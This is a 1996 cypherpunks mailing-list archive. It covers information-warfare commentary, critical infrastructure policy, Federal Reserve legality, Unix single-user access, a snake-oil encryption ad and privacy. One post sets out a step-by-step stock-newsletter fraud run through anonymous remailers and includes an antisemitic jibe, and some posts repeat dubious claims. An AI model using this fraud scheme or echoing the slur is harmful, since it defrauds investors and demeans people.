>  becoming more dependent upon observational proxies than ever=
>  before--photos, audio, video, documents, etc. The memories of observers is=
>  a questionable thing at best (the madness of crowds), but digital trickery=
>  are removing the trust values that we, only a few years ago, were able to=
>  place in 'more reliable' materials. In the case of TWA, just as in most any=
>  case, the creation or faking of evidence requires only modest skills and a=
>  personal computer. Photos can be digital from their origin, and once=
>  transferred into a computer with the right software, they can be merged or=
>  altered in ways that are=20difficult to refute, even when false. Documents=
>  are trivial to manufacture; elements used for provenance, showing a truth=
>  and history of origin, can be falsified in a variety of ways (optically=
>  scanning letterhead or signature, creation from scratch by matching=
>  typeset, etc.), and the textual body can be anything imagined (and textual=
>  analysis or comparison is commonly beyond the capabilities of the=
>  audience). Video and audio are slightly more complex (in levels of effort);=
>  video modification, loosely based on the same technology used to alter=
>  photographs, requires greater skill and more powerful equipment, but is=
>  gradually coming into the range of the average consumer, just as audio=
>  sampling and modification technology has reached the 'garage' level. All=
>  this calls into question any materials of physical evidence, but those=
>  distributed over the Internet are particularly ntrustworthy--even the lower=
>  resolution of net-distribution works to the advantage of the creation of=
>  such materials. I expect this problem to have increasing impact as time=
>  goes on, including in criminal and civil cases (for instance, in the Yousef=
>  case in New York, where he claimed his computer files were faked, or the=
>  potential falsification of photographic evidence in the Simpson civil=
>  trial).
>
> In short, the discussion and materials on/using the Internet have done=
>  little to advance the search for the truth of the matter in TWA 800, and=
>  have done much harm (diverting critical manpower from the investigation,=
>  damaging the credibility of the investigation, etc.).
>
> CIA-Cocaine connection
> TWA and this accusation actually have much in common from a propaganda=
>  standpoint. The allegation (made by the San Jose Mercury News) was that=
>  assets associated with the CIA-backed effort in support of the Contras were=
>  trafficking in cocaine, which helped to finance the (c)overt war. In=
>  particular, the cocaine smuggled into the U.S.A. was supposed to have been=
>  converted into the 'crack' or rock (smokable) form, and introduced into the=
>  African-American urban setting in Los Angeles, with the undertones being=
>  that it was a conspiracy to undermine the solidarity of the A-A community.
>
> Mobile truth: the basic assertion never actually connected the CIA with any=
> =20
> involvement or trafficking, yet the implication (made indirectly or=
>  directly,=20
> depending on the source) was that it was a tacit CIA operation. Far be it=
>  for me to write the apologia for the Agency, but not only is the supposed=
>  action=20
> illegal and immoral, it is also highly unlikely. Creative interpretation of=
>  the=20
> events allowed a rather clever ontological judo--the all-powerful,=
>  all-knowing CIA either had to admit they had no idea what their assets were=
>  involved in (thus damaging the all-knowing aspect of their reputation);=
>  they could admit to knowledge but inaction (thus criminal facilitation, or=
>  having to say that sometimes they need the help of 'bad' people, not a=
>  politically correct position); or they could deny any involvement, and=
>  foster the continual suspicion of cover-up, conspiracy, and hidden agendas.=
>  Any way they move, they lose. This is again a position where history has=
>  created an impression that the Agency would perform the worst action in=
>  support of their own agenda,=20and then actively protect themselves from=
>  investigation; no amount of reform or whitewashing can reverse the trend.=
>  The strength of this attack on the credibility of the Agency is that it=
>  plays so well with public impressions of the Agency, appears to fit the=
>  profile of previous Agency violations of public trust, but can't be=
>  defended against because of the secrecy requirements of the Agency, and the=
>  improbable success of proving a negative assertion (that the Agency wasn't=
>  responsible).
>
> PsyOps: a factor to consider is that the accusations were made during an=20
> election period in a key state where the issue solidified a constituency=
>  into a=20
> solid position against their 'traditional' opposition. The issue is very=
>  much a=20
> political one, and directed at rekindling public animosity about past deeds=
>  (and misdeeds) to shape current public impressions. Again, the long term=
>  casualties of all this are the public trust and credibility of a key but=
>  troubled Agency; politically expedient attacks which undermine the=
>  political process; and the continued progression of the perversion of the=
>  information environment.
>
> Fictive environment: no proof was actually offered (mostly proof by=
>  assertion, as well as collateral association), but the very absence of=
>  proof feeds in to the mobile truth and psyops elements of the operation.=
>  Clearly no public documentation and argument could be offered from an=
>  Agency that must maintain its security and integrity, and no proof could be=
>  offered to prove the Agency wasn't involved, a negative assertion (a common=
>  element in this sort of propaganda operation).
>
> The CIA, Congress, and Justice Department are now engaged in investigations=
>  of the allegations; as such, they will be on-going events to continue the=
>  propaganda campaign, with a predictable end--the Agency finds no proof in=
>  their records and interviews, which is then interpreted as continuing=
>  evidence of a cover-up and conspiracy.
>
> Conclusion-- Media manipulation, particularly using the Internet as a method=
>  of propagation of the propaganda message or as an entry point into the=
>  conventional media cycle, is becoming more of a problem. Clearly everyone=
>  suffers, and the general atmosphere of distrust and disbelief, not to=
>  mention disgust, prevail.
>
> Michael Wilson
> 5514706@mcimail.com
> ------------------------------------------
> To:     infowar@infowar.com
> From: winn@infowar.com
> Date:  November 8, 1996
> Subj:  Electronic Civil Defense Becomes a National Issue
>
> In June of 1991, I testified before Congress that unless we moved forward as=
>  a nation, we faced the possible specter of an "Electronic Pearl Harbor."=
>  Five years to the day later, that same phrase was used by John Deutch and=
>  others to wake up Congress and America that indeed a new concept of=
>  national security has evolved as the Cold War wound down.
>
> I recently ran into a Libertarian friend and lawyer who was somewhat upset=
>  with me. "You are single handedly responsible for the backlash and efforts=
>  of law enforcement to take away our personal freedoms." He was referring to=
>  the comments made by FBI Director Louis Freeh, that additional electronic=
>  eavesdropping capabilities were needed to thwart the threats of domestic=
>  terrorism. He also referred to various law enforcement concerns that unless=
>  US citizens voluntarily complied with a Key Escrow scheme of some variety,=
>  it might be necessary to legislate a common cryptographic system which=
>  would not interfere with government investigations into crime and=
>  terrorism.
>
> "So, it's all my fault?" I asked him in the presence of others.
>
> He paused, and with only a twinge of humor said, "yes."
>
> Well, I do not believe or accept for a moment that the work we have done in=
>  the last several years is solely responsible for the extreme measures being=
>  discussed, but my friend's concerns are legitimate and must be addressed.=
>  He is keenly concerned, as many of us are, that recent headline grabbing=
>  events may trigger law enforcement to overreact and with the emotional=
>  support of many Americans, permit laws to be passed that a few short years=
>  ago we never would have tolerated.
>
> Civil Libertarians are quick to point out that if we permit law enforcement=
>  to regain unbridled powers of electronic eavesdropping, we provide them=
>  with the capability of abuse.
>
> "Today's government may be fine. But we don't know about tomorrow's=
>  government." They openly refer to the abuses of the Hoover FBI where, most=
>  of will admit, things did get out of hand. I've met with CIA case officers=
>  who feel hamstrung by their inability "to get the job done" in an effective=
>  way, because they are paying for the sins of their predecessors. Most of=
>  the FBI agents I know understand the legitimate fears of the civil=
>  liberties groups, but also know that they must have increased access to=
>  technology to defeat criminal activities.
>
> The issue comes down to one of balance. Pure and simple. "Whom do you trust"=
>  is a high profile collateral issue.=20
>
> But let's understand what has catalyzed much of these moves on the part of=
>  law enforcement:
>
> 	- The Oklahoma City bombing
> 	- The World Trade Center bombing
> 	- The Lockerbie Tragedy
> 	- The US Military Bombing in Saudi Arabia
> 	- TWA Flight 800
> 	- The Olympic Bombing
>
> These events trigger deep emotional responses on the part of most Americans=
>  and a call for action. "What can we do?" "Do something." "This shouldn't=
>  happen in America." "Protect us." And the predictable response from law=
>  enforcement is to ask for additional powers. Balance. It's all about=
>  balance.
>
> The critics say that Law Enforcement can push electronic taps past friendly=
>  judges with little inquiry on their part. The FBI says it takes a mass of=
>  paper work and evidence to convince a judge. There were less than 2,000=
>  phone taps issued last year - and I guess I feel that's not a whole lot.=
>  260,000,000 people, less than 2,000 taps. You add it up.=20
>
> Resources on the part of law enforcement are pretty scant. They do not have=
>  the budget or manpower to indiscriminately tap phones everywhere and=
>  analyze their contents. It's manpower intensive. They have to be selective.=
>  In many ways I wish they listened in on more of the bad guys. On one phone=
>  tap, an FBI agent told me, their target said in a taped conversation, "hey,=
>  the feds are tapping the phone. Let's whisper." Bad guys are not all rocket=
>  scientists.
>
> But on a national scale, we do indeed face a new risk, a new vulnerability,=
>  for which my friend blames me. It's all my fault. Right. In "Information=
>  Warfare" and other works, I maintained that the civilian infrastructure was=
>  the unacknowledged target of future adversaries.
>
> I don't believe we will see Submarines sailing up the Potomac, or that enemy=
>  planes will come into San Francisco Bay. Just won't happen. But I fear we=
>  will see attacks against the econo-technical infrastructure, affecting not=
>  only we citizens, but the ability of law enforcement and the military to=
>  function as we wish them to.
>
> On July 15 of this year, President Clinton issued an Executive Order calling=
>  for the Establishment of  President's Commission on Critical Infrastructure=
>  Protection.
>
> I applaud much of it, but I also think we have to maintain caution on how it=
>  is effected. His order says:
>
> Certain national infrastructures are so vital that their incapacity or=
>  destruction would have a debilitating impact on the defense or economic=
>  security of the United States.
>
> These critical infrastructures include:
>
>  telecommunications,
>  electrical power systems,
>  gas and oil storage and transportation,
>  banking and finance,
>  transportation,
>  water supply systems,
>  emergency services (including medical, police, fire, and rescue), and
>  continuity of government.
>
> Threats to these critical infrastructures fall into two categories:
>
> 1. physical threats to tangible property ("physical threats"),
>
> 2. and threats of electronic, radio-frequency, or computer-based attacks on=
>  the information or communications components that control critical=
>  infrastructures ("cyber threats").
>
> Because many of these critical infrastructures are owned and operated by the=
>  private sector, it is essential that the government and private sector work=
>  together to develop a strategy for protecting them and assuring their=
>  continued operation.
>
> This part of President Clinton's statement is right on the mark. These are=
>  all critical structures of the macro-sized econo-technical infrastructure,=
>  of which the NII and other bits are sub-infrastructures. However, when it=
>  comes to forming a committee, the people and groups he wishes to handle the=
>  problem are quite government-centric.
>
> 	- Department of the Treasury;
> 	- Department of Justice;
> 	- Department of Defense;
> 	- Department of Commerce;
> 	- Department of Transportation;
> 	- Department of Energy;
> 	- Central Intelligence Agency;
> 	- Federal Emergency Management Agency;
> 	- Federal Bureau of Investigation;
> 	- National Security Agency.
>
> The committee members are to include:
>
> 	- Secretary of the Treasury;
> 	- Secretary of Defense;
> 	- Attorney General;
> 	- Secretary of Commerce;
> 	- Secretary of Transportation;
> 	- Secretary of Energy;
> 	- Director of Central Intelligence;
> 	- Director of the Office of Management and Budget;
> 	- Director of the Federal Emergency Management Agency;
> 	- Assistant to the President for National  Security Affairs;
> 	- Assistant to the Vice President for National Security Affairs.
>
> The immediate concern I see is that the government wants to take charge on=
>  an issue and threat that is of mutual concern to the private sector and the=
>  government, but that at the highest levels of the President's Order and his=
>  Committee, we see no private sector representation. It is merely on a=
>  consultory basis.
>
> The Commission shall:
>
>         (a) within 30 days of this order, produce a statement of its mission=
>  objectives, which will elaborate the general objectives set forth in this=
>  order, and a detailed schedule for addressing each mission objective, for=
>  approval by the Steering Committee;
>
>         (b) identify and consult with: (i) elements of the public and=
>  private  sectors that conduct, support, or contribute to infrastructure=
>  assurance; (ii) owners and operators of the critical infrastructures; and=
>  (iii) other elements of the public and private sectors, including the=
>  Congress, that have an interest in critical infrastructure assurance issues=
>  and that may have differing perspectives on these issues;
>
>         (c) assess the scope and nature of the vulnerabilities of, and=
>  threats to, critical infrastructures;
>
>         (d) determine what legal and policy issues are raised by efforts to=
>  protect critical infrastructures and assess how these issues should be=
>  addressed;
>
>         (e) recommend a comprehensive national policy and implementation=
>  strategy for protecting critical infrastructures from physical and cyber=
>  threats and assuring their continued operation;
>
>         (f) propose any statutory or regulatory changes necessary to effect=
>  its recommendations; and
>
>         (g) produce reports and recommendations to the Steering Committee as=
>  they become available; it shall not limit itself to producing one final=
>  report.
>
> I first wrote a National Infomation Policy in 1993, and I am pleased to see=
>  that the President has included similar wording. However, a national policy=
>  must, on balance, also provide for enhanced personal electronic security=
>  for the average American. It cannot be a one-sided law enforcement issue.=
> =20
>
> I worry about "consult with industry" along the same lines that the Key=
>  Escrow adherents consulted with industry, but generally did what they=
>  wanted to anyway. This has been an ongoing battle between industry and the=
>  White House with respect to "Clipper" style proposals and export control=
>  over encryption. Do we face the same situation with the Infrastructure=
>  Protection Committee?
>
> In this same vein, the President did recognize some input by the private=
>  sector:
>
> (a) The Commission shall receive advice from an advisory committee=
>  ("Advisory Committee") composed of no more than ten individuals appointed=
>  by the President from the private sector who are knowledgeable about=
>  critical infrastructures. The Advisory Committee shall advise the=
>  Commission on the subjects of the Commission's mission in whatever manner=
>  the Advisory Committee, the Commission Chair, and the Steering Committee=
>  deem appropriate.
>
> Again, the structure is that the government is in charge and the private=
>  sector, whose very interests are at stake here, is reduced to an Advisory=
>  status. This is a keen focus of concern.
>
> But then, a surprising phrase was in the President's Order:
>
> (f) The Commission, the Principals Committee, the Steering Committee, and=
>  the Advisory Committee shall terminate 1 year from the date of this order,=
>  unless extended by the President prior to that date.
>
> Only a year. I've been at this for years and years, and the awareness=
>  process takes significant time. There are still major players both in the=
>  government and the private sector who do not understand the nature of the=
>  threats and vulnerabilities, and I fear that a mere one year effort, led by=
>  some of the busiest people in the country today, will not receive the=
>  attention it deserves.
>
> My Civil Libertarian lawyer friend had significant problems with the=
>  following portion of the President's Order (for which I am blamed, of=
>  course!).
>
> (a) While the Commission is  conducting its analysis and until the President=
>  has an opportunity to consider and act on its recommendations, there is a=
>  need to increase  coordination of existing infrastructure protection=
>  efforts in order to better address, and prevent, crises that would have a=
>  debilitating regional or national impact.  There is hereby established an=
>  Infrastructure Protection Task Force ("IPTF") within the Department of=
>  Justice, chaired by the Federal Bureau of Investigation, to undertake this=
>  interim coordinating mission.
>
> (d) The IPTF shall include at least one full-time member each from the=
>  Federal Bureau of Investigation, the Department of Defense, and the=
>  National Security Agency.  It shall also receive part-time assistance from=
>  other executive branch departments and agencies. Members shall be=
>  designated by their departments or agencies on the basis of their expertise=
>  in the protection of critical   infrastructures.  IPTF members'=
>  compensation shall be paid by their parent agency or department.
>
> "Oh, great!" he exclaimed. "Now we're gonna have the Army sitting with=
>  M-16's outside the phone company, and the NSA listening in on Americans to=
>  see if they pollute the water supply. This is too damned much." He=
>  shuddered at the thought of having the these three groups working together=
>  on a domestic basis. It brought back to him too many memories of bygone=
>  days he would like to see remain in the past.
>
> On the other hand, what better group than the DoD to head up an effective=
>  response organization? The President, rightfully so, put the FBI and the=
>  Dept. of Justice in charge of the IPTF; after all they are responsible for=
>  domestic national law enforcement. But the DoD has massive resources,=
>  capabilities and manpower to deploy in times of trouble.
>
> The trouble is, and we will have to face this dilemma straight on, is that=
>  the US Military cannot be deployed in domestically due to the Posse=
>  Comitatus Act of 1878, without an Executive Order. And the NSA is similarly=
>  restricted from domestic operation, but is standing up its own 1,000 man=
>  Information Warfare division.=20
>
> There are legitimate ways around these problems, and we do need to have=
>  built-in oversights to satisfy the concerns of those who don't want the=
>  government taking over the whole shebang. But the concept of the IPTF's=
>  mission is again, absolutely on mark.
>
> (e) The IPTF's function is to identify and coordinate existing expertise,=
>  inside and outside of the Federal Government, to:
>
> (i) provide, or facilitate and coordinate the provision of, expert guidance=
>  to critical infrastructures to detect, prevent, halt, or confine an attack=
>  and to recover and restore service;
>
> (ii) issue threat and warning notices in the event advance information is=
>  obtained about a threat;
>
> (iii) provide training and education on methods of reducing vulnerabilities=
>  and responding to attacks on critical infrastructures;
>
> (iv) conduct after-action analysis to determine possible future threats,=
>  targets, or methods of attack; and
>
> (v)  coordinate with the pertinent law enforcement authorities during or=
>  after an attack to facilitate any resulting criminal investigation.
>
> The Committee is supposed to address the very issues that many of us have=
>  been addressing - to full audiences, but often empty years. From where I=
>  stand, the White House has caught the vision and it prepared to do=
>  something about it.
>
> My complaints are essentially two fold:
>
> 	1. We have to have greater civilian input and representation on the=
>  Committee at the highest levels, not merely in an advisory capacity.
>
> 	2. The 1 year term is short-sided.
>
> And yes, I do agree with my Libertarian pal, that however this all shakes=
>  out, we must have a third party oversight process to insure we never do=
>  return to the abusive days of yore.
>
> Kudos to the White House for putting Electronic Civil Defense on their=
>  plate.
>
> For a complete copy of the Presidential Order: http://www.infowar.com
>
> Winn Schwartau
> ------------------------------------------------------------
>
> END
>
> Infowar             Sunday, November 10 1996        Volume 01: Number 02
>
>
> DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT
> in the subject line.
>
> Subscribe infowar        TO JOIN GROUP
> Unsubscribe infowar    TO LEAVE GROUP
> Help infowar               TO RECEIVE HELP=20
> TO POST A MESSAGE:  E-Mail to   infowar@infowar.com =20
>
> _____________________________________________________
> Infowar.Com
> Interpact, Inc.
> Winn Schwartau
> winn@infowar.com
> http://www.infowar.com
> 813-393-6600  Voice
> 813-393-6361  FAX
>
> Sponsor Opportunities/Comments/Help
>
> Betty G. O'Hearn
> Assistant to Winn Schwartau
> http://www.infowar.com
> betty@infowar.com
> 813-367-7277  Voice
> 813-363-7277  FAX
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Renner <dougr@skypoint-gw.globelle.com>
Date: Mon, 11 Nov 1996 18:18:30 -0800 (PST)
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <Pine.SUN.3.95.961111094329.3168B-100000@viper.law.miami.edu>
Message-ID: <Pine.3.89.9611112333.B16991-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 11 Nov 1996, Michael Froomkin - U.Miami School of Law wrote:

> Instead of reading the rabid nonsense referred to in the previous post in
> this thread, try
> 
> http://www.law.miami.edu/~froomkin/articles/reinvent.htm

[snip]

Michael you make some outstanding points in your article!  One that struck 
me was:

  "Today more federal corporations exist than ever before in 
peacetime, and the number keeps growing. While toiling in obscurity, they
manage communication satellites, museums, railroads, and power 
generation.  They provide specialized credit and insurance for housing and
agriculture.  They exist as accounting devices to hide the true size of 
the budget deficit, as nonprofit organizations, and as highly profitable 
and highly leveraged economic colossi. The most profitable corporations, 
which provided a total of about $5 trillion in credit and insurance in 
1995, also have approximately $1.5 trillion in securities and other debt 
outstanding.  These organizations are capable of squirreling away $2 
billion for a rainy day, while pleading poverty to Congress.{10} "

Michael, clearly your article is much more professionally written and 
well organized, and it addresses some primary issues raised in the previous 
article nearly head-on.  However is it true that what you are saying is 
that two fundamental premises in the article you refer to as "rabid" are 
incorrect?  Namely:

"ARTICLE 1, SECTION 8 OF THE CONSTITUTION STATES THAT CONGRESS SHALL HAVE
THE POWER TO COIN (CREATE) MONEY AND REGULATE THE VALUE THEREOF.

"IN 1935 THE SUPREME COURT RULED THAT CONGRESS CANNOT CONSTITUTIONALLY
DELEGATE ITS POWER TO ANOTHER GROUP. (Reference 22, P. 168)

Are these not correct?  Anyway, there were issues other than mere legality 
discussed, including history & practicality.  Specifically, the quotes from 
Benjamin Franklin, Thomas Jefferson, Rothschild, references to 
Congressional Record, etc. were what had impressed me in the link 
below.

> On Mon, 11 Nov 1996, Doug Renner wrote:

http://feustel.mixi.net/GOV/DEPTS/fedres.html

Is it an accurate statement that we are effectively paying the Fed 
interest on the currency we carry?

> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law |
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | It's warm here. 
> 

Or am I just making that common but incorrect assumption that 
unconstitutionality entails illegality?

Thanks for responding to this thread, Michael.  Your input is very much 
valued.

Regards,
IAJAT (just a taxpayer)
Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Tue, 12 Nov 1996 00:41:35 -0800 (PST)
To: "Matts Kallioniemi" <matts@cyberpass.net>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611120841.AAA16334@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 08 Nov 1996 14:46:56 +0100, Matts Kallioniemi wrote:

>At 17:12 1996-11-07 -0800, jim bell wrote:
>>Simple analogy:  Suppose you put two people into a room with a deck of 
>>playing cards and a table, instructing "Person A" to build a house-of-cards, 
>>and telling "Person B" to stop him from achieving his goal.  Who do you 
>>think will win?  Obviously, the latter will win:  It's vastly easier to 
>>knock such a structure down than to build it in the first place,  and all 
>>"Person B" has to do is occasionally take a whack at the structure. 
>
>What if Person A is better armed? Could that change the outcome?
>
>
>

What if person A has a pack of chewing gum?


mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jim@santafe.arch.columbia.edu>
Date: Mon, 11 Nov 1996 22:44:10 -0800 (PST)
Subject: Re: two bogus messages to this list
In-Reply-To: <Pine.BSF.3.91.961111182838.3985C-100000@mcfeely.bsfs.org>
Message-ID: <Pine.NEB.3.94.961112014731.25826A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Nov 1996, Rabid Wombat wrote:

> Um, not to disagree with you re Intel/Micro$loth, but most UNIX systems 
> can be brought up in single-user mode and the root password changed by 
> anyone with physical access to the system. You could end up with even 
> more trouble than if someone messed with your M$ box.

This is far over-simplified.  Most BSD derived Unices provide the _option_
for single-user mode not to be password protected (depending on whether the
console is marked secure in /etc/ttys).  A few default to this behavior,
but on all it is either a configuration choice or a password is always
required (as it is in USG'ish unices).

--

				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Tue, 12 Nov 1996 01:56:01 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Money-making ideas for Igor Chudov
In-Reply-To: <Pso9wD37w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961112045010.17509B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 11 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Mon, 11 Nov 96 12:22:48 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> Reply-To: freedom-knights@jetcafe.org
> To: cypherpunks@toad.com
> Subject: Money-making ideas for Igor Chudov
> 
> "Igor 'FUCK MNE HARDER' Chudov @ home" <ichudov@algebra.com> writes:
> 

algebra.com is a suspect domain.

> > manifold::~==>premail -t cypherpunks@toad.com
> > Chain: haystack;jam
> > Subject: I urgently need a lot of money.
> >
> > Please share your money-making secrets, I am in a desperate need
> > for cash.
> 
> For shame! Igor Chewed-off disgraces his Chewish Mommy by even asking. Isn't
> propensity for "gesheft" genetic? Here's another money-making idea for Igor:
> 
> Igor obtains a list of e-mail addresses of people interested in equity-related
> investments (e.g. by watching misc.invest.* and sending the posters / those who
> voted for their creation unsolicited e-mail; or by posting anonymous ads,
> inviting the readers to reply to a reply block in order to receive 3 free
> promotional issues of an investment advice newsletter; or even by starting up
> his own private financial derivatives mailing list). Igor divides the mailing
> list into 2^3=8 parts, and gives them exotic Russian-sounding names: Aleksej,
> Boris, Vasilij, Grigorij, Dmitrij, Elena, Zhenja, Zoya.
> 
> Igor then uses an anonymous remailer to spam everyone on his mailing list with
> the 8 variants of the following message: "Congratulations! You have won 3 free
> issued of the _Boris Investment Newsletter, published in Tulsa, Oklahoma, by a
> proud holder of a Master's Degree in Financial Engineering from the Moscow
> State University. I predict that within the next month Adobe stock will go up."
> 
> Instead of "Boris", Igor will substitute one of the 8 newsletter names; instead
> of Adobe, he can use any volatile stock that's as likely to go up as down; and
> the predicted stock price movement will be "up" in the first four newsletters
> and "down" in the other four.
> 
> One month later the stock in question is either up or down. Without loss of
> generality, suppose that it's gone down. Aleksej, Boris, Vasilij, and
> Grigorij's investment advice was wrong, they disappear from the face of the
> earth, and the former recipients of their newsletters don't get bothered any
> more. (Or they could be recycled for future scams; or they could be send the
> remaining 2 issues of worthless advice, as promised.) On the other hand
> Dmitrij, Elena, Zhenja, and Zoya guessed right, so this time they send out a
> new investment newsletter via the anonymous remailers:
> 
> "Congratulations! You continue to receive the free investment advice newsletter
> from Zoya in Tulsa, Oklahoma. Last month I correctly predicted that Adobe will
> have gone down. If you're smart, you've shorted Adobe's stock and made lots of
> money by now. This month I predict that Cisco will go _down as well."
> 
> Again, Dmitrij and Elena predict that some other volatile stock goes up, while
> Zhenja and Zoya predict that it goes down. Suppose D&E are right. Igor leaves
> the Zh.&Z. partitions alone. One month later D&E's subscribers get letter #3:
> 
> "Congratulations! You continue to receive the free investment advice newsletter
> from Elena in Tulsa, Oklahoma. Two months ago I predicted that Adobe would go
> down. I hope you sold it short. Last month I predicted that Cisco would go up.
> I hope you bought it. This month I predict that Lucent will go _up."
> 
> One month later one of the two is right, so its recipients get the fourth and
> final e-mail from an anonymous remailer, this time using a reply block:
> 
> "I've given you three free stock tips over the last 3 months which probably
> made you a lot of money. Now that you've seen my track record, you'll want to
> continue receiving my free advice, but the free promotion is over. Please send
> $20 in untraceable digital cash to this reply block to receive 6 future
> issues."
> 
> Quite a few people would risk the $20, but that would be the last they hear
> from Igor. :-)
> 
> (Alternatively, he can even e-mail 6 more issues of worthless advice to those
> who caughed up the $20, so they can't complain. It would be hard to prosecute
> Igor without proving that all 8 newsletters were published by the same person
> who's been giving contradictory advice to different people.)
> 
But what Law would you charge him with?
Unless you could prove his "intent" I see no way that you
could ever prove any case against him.


> "Credibility is expendable." - John Gilmore
> 

He just says that because he spent his.

> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

when we got the info that the Startronix was going to be late,
we sold STNX short at $1.03 ...

They are almost two months late; is STNX it a hoax?


-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Weller <stevenw@best.com>
Date: Tue, 12 Nov 1996 07:55:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: More snake oil: ENIGMA
Message-ID: <v0300780daeae49989465@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Seen on usenet. I'm not currently subscibing to the list, so I hope it's
not old news.

----------------------------------->8--------------------------------

Can You KEEP a SECRET?

Doctor? Lawyer? Accountant? Executive? Or even Politician? -- you know
there is some information your clients don't want to fall into public
hands. Can you
keep a secret? They want you to. Let's face it, you want to keep some
things a secret as much as they do!

Now you can. Now there is an unbreakable version of ENIGMA which is so
easy to use that a child can send messages the CIA can't break.

Perhaps you remember the original version of ENIGMA used so successfully
by the Germans during World War II. Hundreds of cryptologists worked for
thousands of
hours to unscramble the secret orders being flashed openly over the air
waves by the Germans. In the end, allies cracked the code only by
stealing one of the machines.

With ULTRA ENIGMA 2.0 stealing the machine won't do your enemies any
good at all. First, the New ENIGMA is a thousand times more complex. Yet
it only takes a matter of minutes for you to lock up whole directories
of your secret files securely. Then your secrets are safe. They are
secure, Now and Forever.

Your secrets are safe because there is no place for cryptologists to
begin, no way they can tell which part of the code is part of the secret
and which part is garbage, no way of telling if the file is long, or
short, or a drawing, or a picture, and it might even be in a foreign
language for all they know. Yes, the new ENIGMA really can encode
drawings, pictures, X-Rays and absolutely anything else you can put into
a computer. Can You keep a Secret? With ENIGMA you can... ENIGMA is so
secure that not even the producers can crack your secrets open.

ENIGMA is seamless. Nobody can crack the codes you set but you. Now
that's a Secret you can tell everybody! Your clients will be glad to
hear it, and you'll
sleep better knowing it is true.

Let us spill out the Secret Details of ENIGMA for you to examine. Take
just a moment to glance through our pages. We'll show you how it works,
and explain why it works. Then,
especially for Governments and other high risk situations,, we reveal
why even the weak link, (knowing the encoder) can be eliminated with a
Fortune Cookie blindly selected from a randomly available jar with
thousands of cookies shuffled back and forth at the company. Think about
it;, if YOU don't pick the keys, how can ANYONE guess which keys You
Pick? And we are sorry, but NO... the company won't have any idea which
keys you pick either..! -- Think of it this way, some things are best
kept a secret between you and you. As an added bonus, we'll also show
you some other professional ways you can guard your secrets.
http://www.enigma-co.com will bring you to our front page.
                            ENIGMA
                       5525 McMurtrey Drive
                North Little Rock, AR 72218-5248

                          For Support use these numbers
                            http://www.enigma-co.com
                      Phone (501)758-8040 8am-10pm CST
                              Fax (501) 758-8016

             All our sales are maintained by WorldWide Sales Depot
                    So,,, For Foreign Dealership information,
                  Sales and Orders .... use these special numbers

                               104344.2000@compuserve.com
                   Fone: (401) 945-4262 ** FAX: (501) 945-4203

Sales literature, web page design and layout (c) copyright 1996 by
WorldWide Sales Depot
--
"Arkansas Showcase" lists the major links, features, fotos, and fun you
can have
 outside on the run in Arkansas. Drop by and sign my guestbook posted at
http:www.cris.com/~Talewins

-------------------------------------------------------------------------
Steven Weller  stevenw@best.com

  "There was really no reason why we did anything the way we did. But, of
course, there was a reason why we did things for no reason at all".
                                                         -- Michael Palin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Tue, 12 Nov 1996 04:52:55 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611111626.IAA31552@crypt>
Message-ID: <Pine.GSO.3.95.961112075044.16750D-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


For starters, don't get them a National ID, um, social security number.
I'm pretty sure that makes it a lot harder to put the dossier, um,
_profile_ together.

Brad

On Mon, 11 Nov 1996, Hal Finney wrote:

> Black Unicorn makes a lot of good points regarding privacy.  One thing
> I wanted to follow up on:

> 
> Are there other measures which parents could take while their children are
> young to get them off to a good start, privacy-wise?
> 
> Hal
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 12 Nov 1996 07:54:30 -0800 (PST)
To: "Michael Froomkin - U.Miami School of Law" <dougr@skypoint-gw.globelle.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
Message-ID: <v02140b0caeae43e8fb97@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 PM 11/11/1996, "Michael Froomkin - U.Miami School of Law"
<froomkin@law.miami. wrote:
> On Tue, 12 Nov 1996, Doug Renner wrote:
>> article nearly head-on.  However is it true that what you are saying is
>> that two fundamental premises in the article you refer to as "rabid" are
>> incorrect?  Namely:

